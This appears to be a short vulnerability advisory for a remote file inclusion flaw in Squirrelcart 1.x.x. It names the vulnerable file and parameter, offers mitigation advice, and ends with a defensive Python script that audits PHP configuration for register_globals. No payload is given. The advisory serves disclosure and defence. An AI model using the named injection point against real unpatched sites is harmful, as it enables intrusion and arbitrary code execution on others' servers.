vendor: Squirrelcart
by: ShaiMagal
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Squirrelcart
Affected Version From: 1.x.x
Affected Version To: 1.x.x
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Squirrelcart <= 1.x.x Remote File Inclusion
The vulnerability allows an attacker to include a remote file in the vulnerable file 'popup_window.php' of Squirrelcart version 1.x.x. By manipulating the 'site_isp_root' parameter, an attacker can execute arbitrary code or include malicious files from a remote server.
Mitigation:
To mitigate this vulnerability, it is recommended to update Squirrelcart to a version higher than 1.x.x. Additionally, ensure that the 'register_globals' directive is set to 'off' in the PHP configuration.
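
To verify the 'register_globals' recommendation above on a host, the effective value can be computed from php.ini plus any Apache per-directory override. This is an added example, not code from the advisory or from Squirrelcart. The function names, the sample inputs, the extra 'allow_url_include' check and the "missing means Off" default (PHP 4.2.0 and later) are assumptions.

```python
import re

# Values PHP parses as boolean true in ini files (case-insensitive).
TRUTHY = {"1", "on", "true", "yes"}
# Directives audited. register_globals comes from the advisory; allow_url_include
# is an added check (assumption). A missing directive is treated as Off.
DEFAULTS = {"register_globals": False, "allow_url_include": False}

INI_LINE = re.compile(r"^\s*([A-Za-z0-9_.]+)\s*=\s*(.*?)\s*$")
APACHE_LINE = re.compile(r"^\s*php_(?:admin_)?(?:flag|value)\s+(\S+)\s+(\S+)", re.I)


def _as_bool(raw):
    return raw.strip().strip("\"'").lower() in TRUTHY


def effective_settings(php_ini, apache_conf=""):
    """Return {directive: bool} from php.ini text, then Apache/.htaccess overrides."""
    settings = dict(DEFAULTS)
    for line in php_ini.splitlines():
        line = line.split(";", 1)[0]  # drop ini comments
        m = INI_LINE.match(line)
        if m and m.group(1).lower() in settings:
            settings[m.group(1).lower()] = _as_bool(m.group(2))  # last one wins
    for line in apache_conf.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = APACHE_LINE.match(line)
        # Only the register_globals per-directory override is modelled here.
        if m and m.group(1).lower() == "register_globals":
            settings["register_globals"] = _as_bool(m.group(2))
    return settings


def findings(php_ini, apache_conf=""):
    """Sorted list of audited directives that end up enabled."""
    return sorted(k for k, v in effective_settings(php_ini, apache_conf).items() if v)


# Constructed sample inputs, not taken from a real server.
SAMPLE_INI = "[PHP]\nregister_globals = Off ; hardened\nallow_url_include = Off\n"
SAMPLE_HTACCESS = "# legacy cart needs globals\nphp_flag register_globals on\n"

if __name__ == "__main__":
    print("php.ini only:", findings(SAMPLE_INI))
    print("with .htaccess:", findings(SAMPLE_INI, SAMPLE_HTACCESS))
```

A clean php.ini is not enough on its own: the second call shows a per-directory `php_flag` line turning 'register_globals' back on for the application.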